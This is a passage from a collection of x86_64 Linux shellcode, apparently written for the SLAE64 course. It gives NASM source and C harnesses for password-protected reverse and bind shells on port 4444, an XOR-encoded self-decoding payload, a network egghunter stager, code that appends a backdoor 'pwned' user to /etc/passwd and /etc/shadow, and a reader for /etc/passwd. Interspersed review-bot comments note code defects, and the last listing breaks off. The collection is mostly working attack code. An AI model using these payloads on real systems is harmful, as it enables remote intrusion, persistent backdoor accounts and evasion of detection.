sub byte [rdi+11], 0x41 ; set last byte to 0x00
sub byte [rdi+24], 0x41 ; set last byte to 0x00
; open (1)
push 2
pop rax
syscall
push rax
pop r14 ; source
; open (2)
add rdi, 12
push 0x66
pop rsi
push 2
pop rax
syscall
push rax
pop r15 ; destination
; read
xor rax, rax
push r14
pop rdi
push rsp
pop rsi
mov dx, 0xFFFF
syscall
; write
push rax
pop rdx
push r15
pop rdi
push 1
pop rax
syscall
; exit
push 60
pop rax
syscall
string_1:
call cont_1
; first byte stays the original value
s_1: db 0x2F, 0x57, 0x46, 0x51, 0x1D, 0x42, 0x53, 0x41, 0x41, 0x45, 0x56, 0x73, 0x1D, 0x46, 0x5F, 0x42, 0x1D, 0x5D, 0x47, 0x46, 0x54, 0x5B, 0x5E, 0x57, 0x73


@ -0,0 +1,176 @@
; ===================================================================
; Password Protected Reverse Shell
; Author: SLAE64-1351 (Keyman)
; Date: 04/09/2014
;
; Shellcode length: 136 bytes
;
; Description:
;
; Simple reverse shell (listens on port 4444 by default) with
; bytes password protection. Using a 4 bytes long password is
; still reasonably strong for a single-shot connection and keeps
; the code shorter.
;
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
;
; Before the code gets executed make sure to create a listener:
;
; nc -lvp <port number>
;
; After you receive the connection you will see no password
; prompt. Just type in the 4 bytes long password and hit enter.
; If the password matches, you are ready to type OS commands.
;
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Host to connect to. Please note that this value will have
; 0x02020202 added to it, this way avoiding the NULL bytes.
%define exp_host 0xFEFDFE7D ; 127.0.0.1
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use. Make sure it's not longer than 4 bytes.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_connect 42
%define sys_read 0
%define sys_execve 59
%define sys_dup2 33
_start:
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
syscall
; ---------------------------------------------------------------
; START: create struct
;
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
;
; This is how it looks like on the stack:
; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01
; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
; TODO: have to make this shorter somehow
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
mov dword [rsp+4], exp_host
add dword [rsp+4], 0x02020202
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; START: connect
; ---------------------------------------------------------------
; rdx is still 0
push rax ; socket fd
pop rdi
add dl, 16
mov al, sys_connect
syscall
; ---------------------------------------------------------------
; get passwd
;
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
;
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
sub rdx, 12 ; set bytes to read (4)
syscall
; compare pass received with valid pass and exit if no match
push rax
pop rcx
push rdi ; save socket
pop rax
sub rcx, 3 ; read only once
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
cmpsq
jne passfail ; passwd match, give shell
shell:
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2 ; rcx is 1, so add 2 = 3
push rax ; restore socket
pop rdi
dup_loop:
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
syscall
pop rcx ; restore the counter
loop dup_loop
jmp mytext
code:
pop rdi
mov [rdi+7], BYTE al
push rax
pop rdx
add al, sys_execve
syscall
mytext:
call code
MyText: db '/bin/sh', 0x41
passfail:
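Review bot: The header and the struct comment describe a listener, but this code connects out. The description says "listens on port 4444 by default", `exp_port` is commented "Port number to listen on", and the struct block shows `srv_addr.sin_addr.s_addr = INADDR_ANY`, while the instructions store `exp_host` at `[rsp+4]` and issue `sys_connect`. These comments look carried over from the bind-shell listing that follows. I would reword them to `; Simple reverse shell (connects to exp_host:exp_port, 127.0.0.1:4444 by default)` and `; srv_addr.sin_addr.s_addr = exp_host + 0x02020202`, and restore the missing "4" in "with bytes password protection".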


@ -0,0 +1,214 @@
; ===================================================================
; Password Protected Bind Shell
; Author: SLAE64-1351 (Keyman)
; Date: 03/09/2014
;
; Shellcode length: 147 bytes
;
; Description:
;
; Simple bind shell (listens on port 4444 by default) with 4 bytes
; password protection. Using a 4 bytes long password is still
; reasonably strong for a single-shot connection and keeps the
; code shorter.
;
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
;
; After the code gets executed connect to the newly opened port:
;
; nc <IP address> <port number>
;
; There is no password prompt. Type in the 4 bytes long password
; and hit enter. If the password matches, you are ready to type
; OS commands.
;
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_bind 49
%define sys_listen 50
%define sys_accept 43
%define sys_execve 59
%define sys_dup2 33
_start:
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
syscall
; ---------------------------------------------------------------
push rax ; store sockfd as first
pop rdi ; argument of bind
; ---------------------------------------------------------------
; START: create struct
;
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
;
; This is how it looks like on the stack (port is 4444):
;
; 0x02 0x00 0x11 0x5c 0x00 0x00 0x00 0x00
; 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
pop rax ; clear rax so can be
; used for syscall Nr.
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; bind socket
; ---------------------------------------------------------------
push rax
pop rdx
add dl, 16 ; socklen_t addrlen
add al, sys_bind ; syscall number
syscall
; ---------------------------------------------------------------
; listen
; ---------------------------------------------------------------
; rdi should still hold the socket descriptor so we don't
; have to set it again
; We can save a 'xor rax, rax' here.
; If success, 0 is returned by bind, we will have the rax reg.
; cleared.
push 2
pop rsi
add al, sys_listen
syscall
; ---------------------------------------------------------------
; accept
; ---------------------------------------------------------------
; rdi should still hold the socket descriptor so we don't
; have to set it again
; We can save a 'xor rax, rax' here.
; If success, 0 is returned by listen, we will have the rax reg.
; cleared.
push rax
pop rdx
push rax
pop rsi
add al, sys_accept
syscall
; at this point rax contains the new socket descriptor
push rax ; save new sockfd
push rax ;
pop rdi ; first argument for
; read()
pop r15 ; save for later
; ---------------------------------------------------------------
; get passwd
;
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
;
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
xor rax, rax ; read() is syscall Nr. 0
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
add rdx, 4
syscall
; compare pass received with valid pass and exit if no match
xor rcx, rcx
inc rcx
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
cmpsq
jne passfail ; passwd match, give shell
shell:
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2
mov rdi, r15
dup_loop:
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
syscall
pop rcx ; restore the counter
loop dup_loop
jmp mytext
code:
pop rdi
mov [rdi+7], BYTE al
push rax
push rax
pop rsi
pop rdx
add al, sys_execve
syscall
mytext:
call code
MyText: db '/bin/sh', 0x41
passfail:


@ -0,0 +1,50 @@
; ===================================================================
; "Polymorphic" version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-658.php
; Author: SLAE64-1351 (Keyman)
; Date: 21/09/2014
;
; Length: 273 bytes (got shorter by 117 bytes)
;
; The original code was optimized. This way it became 240 bytes long.
; Each byte of the optimized shellcode was XOR'ed with 0xDE. The
; result was dumped as the encoded shellcode below. A decoder stub
; was implemented to XOR each byte of "shellcode" with 0xDE. (except
; the first byte). After the decoding is finished execution is
; passed to the original (decoded) shellcode.
;
; ===================================================================
section .text
global _start
_start:
; -------------------------------------------------------------------
; Shellcode decoder stub
; -------------------------------------------------------------------
push 1
pop rcx
begin:
cmp rcx, 1
je begin_sc
pop rdi ; rdi points to the shellcode
push byte 0x78
pop rcx
add rcx, 0x77
decode:
xor byte [rdi+rcx], 0xDE
loop decode
jmp shellcode
begin_sc:
dec rcx
call begin
; -------------------------------------------------------------------
; Encoded shellcode
; -------------------------------------------------------------------
shellcode:
sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4


@ -0,0 +1,193 @@
;Exam Assignment 3
;implementation of egghunter
;Default egg = "deaddead" ;
;If connected the stager check of egg , if present execute the code ;
;You can send a maximum of 255 bytes (egg + code) ;
;if no egg , shellcode exit ;
;Christophe G SLAE64 - 1337 ;
global _start
jmp short _start
_start_code :
call rsi
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rdx , rdx
push rdx ; null into the stack
push byte 0x29 ; syscall number 41
pop rax
push byte 0x2 ; AF_INET
pop rdi
push byte 0x1 ; SOCK_STREAM
pop rsi
syscall
; copy socket descriptor to rdi for future use
xchg rax , rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value)
not rbx
push rbx
push rsp ; save rsp value into the stack , needed for rsi later
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push byte 0x31 ; (49)
pop rax
pop rsi ; retrieve value of rsp pushed into the stack before
push byte 0x10 ; (16 bytes) sockaddr_len
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
push byte 0x32 ; (50)
pop rax
push byte 0x2 ;MAX_CLIENTS
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
push byte 0x2b ; Accept syscall
pop rax
sub rsp, 0x10
push rsp
pop rsi ;(struct sockaddr *)&client
push byte 0x10
push rsp
pop rdx ; &sockaddr_len
syscall
; store the client socket description
mov r9, rax
; close parent
push byte 0x3
pop rax
syscall
xchg rdi , r9 ; restore client socket description to rdi
xor rsi , rsi
dup2:
push byte 0x21
pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop
syscall
inc rsi
cmp rsi , 0x3 ; go in the next couple of instruction if equals
loopne dup2
xor rsi , rsi
mul rsi
xor rdi , rdi
sub spl , 0xff
mov rsi , rsp
mov dl , 0xff
syscall
Inc_rsi:
cmp dil , 0xff
jz Exit
inc rsi
inc rdi
cmp [rsi - 4] , dword 0x64616564 ; egghunter
jnz Inc_rsi
cmp [rsi - 8] , dword 0x64616564
jnz Inc_rsi
jz _start_code
Exit:
push byte 0x3c
pop rax
syscall
------------------------------------------------------------------------------------------------------------------------------------------------
Usage :
Execve Shellcode
#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444
"x68\x85\x11\x47\x02" -->> dumm bytes
"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead)
"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10"
"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42"
"\x42\x43\x43\x43\x43\x43\x43\x43\x43"
---------------------------------------------------------------------------------------------------------------------------------------------------
Shellcode :
#include <stdio.h>
#include <string.h>
unsigned char stager[] = \
"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05";
int main()
{
printf("Stager Length: %d\n", (int)strlen(stager));
(*(void (*)()) stager)();
}


@ -0,0 +1,108 @@
; shellcode name add_user_password_JCP_open,write,close
; Author : Christophe G SLAE64-1337
; Len : 358 bytes
; Language : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with open,write,close
; tested kali linux , kernel 3.12
global _start
_start:
xor rax , rax
push rax
pop rsi
push rax ; null all register used for open syscall
pop rdx
add al , 0x2
mov rdi , 0x647773ffffffffff
shr rdi , 0x28
push rdi ; "/etc/passwd"
mov rdi , 0x7361702f6374652f
push rdi
mov rdi , rsp
mov si , 0x441
mov dx , 0x284
syscall ; open syscall
xor edi , edi
add dil , 0x3
jmp short findaddress ; I placed the jmp short here size of code is too lenght for jmp short if placed in head
_respawn:
pop r9
mov [r9 + 0x30] , byte 0xa ; terminate the string
lea rsi , [r9] ; "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash'
mov al , 0x1
xor rdx , rdx
add rdx , 0x31
syscall ; write syscall
xor edi , edi
add dil , 0x3
push rdi
pop rax
syscall ; close syscall
xor rax , rax
push rax
pop rsi
add al , 0x2
mov rdi , 0x776f64ffffffffff ; open '/etc/shadow'
shr rdi , 0x28
push rdi
mov rdi , 0x6168732f6374652f
push rdi
mov rdi , rsp
mov si , 0x441
mov dx , 0x284
syscall ; open syscall
xor rax , rax
add al , 0x1
xor edi , edi
add dil , 0x3
lea rsi , [r9 + 0x31] ; "pwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::", 0xa
push rax
pop rdx
add dl , 0x83
syscall ; write syscall
xor edi , edi
add dil , 0x3
push rdi
pop rax
syscall
xor rax , rax
add al , 0x3c ; exit (no matter value of exit code)
syscall
findaddress:
call _respawn
string : db "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bashApwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::",0xa
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc0\x50\x5e\x50\x5a\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x73\x77\x64\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x70\x61\x73\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x31\xff\x40\x80\xc7\x03\xeb\x74\x41\x59\x41\xc6\x41\x30\x0a\x49\x8d\x31\xb0\x01\x48\x31\xd2\x48\x83\xc2\x31\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x50\x5e\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x73\x68\x61\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x48\x31\xc0\x04\x01\x31\xff\x40\x80\xc7\x03\x49\x8d\x71\x31\x50\x5a\x80\xc2\x83\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\x87\xff\xff\xff\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x70\x77\x6e\x65\x64\x3a\x24\x36\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x0a";
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
(*(void (*)()) code)();
}


@ -0,0 +1,45 @@
; shellcode name add_user_password
; Author : Christophe G SLAE64-1337
; Len : 273 bytes
; Language : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with echo cmd
; tested kali linux , kernel 3.12
global _start
_start:
jmp short findaddress
_realstart:
pop rdi
xor byte [rdi + 7] , 0x41 ; replace A to null byte "/bin/shA"
xor byte [rdi + 10] ,0x41 ; same "-cA"
xor rdx , rdx
lea rdi , [rdi]
lea r9 , [rdi + 8]
lea r10 , [rdi + 11]
push rdx
push r10
push r9
push rdi
mov rsi , rsp
add al , 59
syscall
findaddress:
call _realstart
string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow"
unsigned char code[] = \
"\xeb\x24\x5f\x80\x77\x07\x41\x80\x77\x0a\x41\x48\x31\xd2\x48\x8d\x3f\x4c\x8d\x4f\x08\x4c\x8d\x57\x0b\x52\x41\x52\x41\x51\x57\x48\x89\xe6\x04\x3b\x0f\x05\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x2d\x63\x41\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x5c\x24\x36\x5c\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x5c\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
;
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
(*(void (*)()) code)();
}
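Review bot: The C harness that follows the NASM listing calls `printf` and `strlen`, but this section has no `#include <stdio.h>` or `#include <string.h>`, unlike the harness in the preceding file. The assembly above it is also not inside a comment, so as committed the file reads as neither valid NASM nor valid C. I would wrap the listing in `/* ... */` and add the two includes before `unsigned char code[]`. The header says only "add user and password with echo cmd"; the string at the end shows the two targets, so a line such as `; writes: appends one line each to /etc/passwd and /etc/shadow` would state the side effect for anyone reviewing or building file-integrity rules from this entry.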


@ -0,0 +1,51 @@
BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start
section .text
_start:
jmp _push_filename
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
; syscall exit
xor rax, rax
add al, 60
syscall
_push_filename:
call _readfile
path: db "/etc/passwdA"
Shellcode:
\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41


@ -0,0 +1,148 @@
;Bind_TCP 4444 with password ;
;Default password = Password ;
;If connected the shellcode no prompt for password ;
;Enter password directly and you get the bin/sh shell;
;if password is wrong the shellcode exit: ;
;Christophe G SLAE64 - 1337 size 173 bytes ;
global _start
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
push 0x29
pop rax
push 0x2
pop rdi
push 0x1
pop rsi
xchg rbx , rdx
syscall
; copy socket descriptor to rdi for future use
xchg rax , rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
mov dword [rsp - 4] , eax
mov word [rsp - 6] ,0x5c11
mov byte [rsp - 8] , 0x2
sub rsp , 8
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push 0x31
pop rax
mov rsi, rsp
push 0x10
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
push 0x32
pop rax
push 0x2
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
push 0x2b
pop rax
sub rsp, 0x10
mov rsi, rsp
push 0x10
mov rdx, rsp
syscall
; store the client socket description
mov r9, rax
; close parent
push 0x3
pop rax
syscall
xchg rdi , r9
xor rsi , rsi
dup2:
push 0x21
pop rax
syscall
inc rsi
cmp rsi , 0x2
loopne dup2
CheckPass:
xor rax , rax
push 0x10
pop rdx
sub rsp , 16 ; 16 bytes to receive user input
mov rsi , rsp
xor edi , edi
syscall ; system read function call
mov rax , 0x64726f7773736150 ; "Password"
lea rdi , [rel rsi]
scasq
jz Execve
push 0x3c
pop rax
syscall
Execve:
xor rax , rax
mov rdx , rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
push 0x3b
pop rax
syscall
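Review bot: The check under `CheckPass` compares only eight bytes, which the header comment does not say. `scasq` tests the first quadword of the 16-byte read against the immediate `0x64726f7773736150`, so any input that begins with `Password` takes the `jz Execve` branch. The value is also stored in clear in the instruction stream. I would add `; NOTE: only the first 8 bytes of the input are compared; the password is a clear-text immediate` above `CheckPass`. For detection work, that immediate and the port word `0x5c11` (4444) are fixed byte sequences in this listing.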


@ -0,0 +1,107 @@
/*
; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322
; 138 bytes
global _start
section .text
_start:
;socket syscall
push byte 0x29 ; 41 socket
pop rax
push byte 0x2 ; AF_INET
pop rdi
push byte 0x1 ; SOCK_STREAM
pop rsi
cdq ;rdx = 0 - ANY
syscall
xchg rdi, rax ; save socket descriptor
mov dword [rsp-4], 0x0901a8c0 ; ip
mov word [rsp-6], 0x5c11 ; port 4444
mov byte [rsp-8], 0x02
sub rsp, 8
push byte 0x2a ; connect
pop rax
mov rsi, rsp ; pointer
push byte 0x10 ; len
pop rdx
syscall
push byte 0x3; counter
pop rsi
dup2_loop:
dec rsi
push byte 0x21
pop rax
syscall
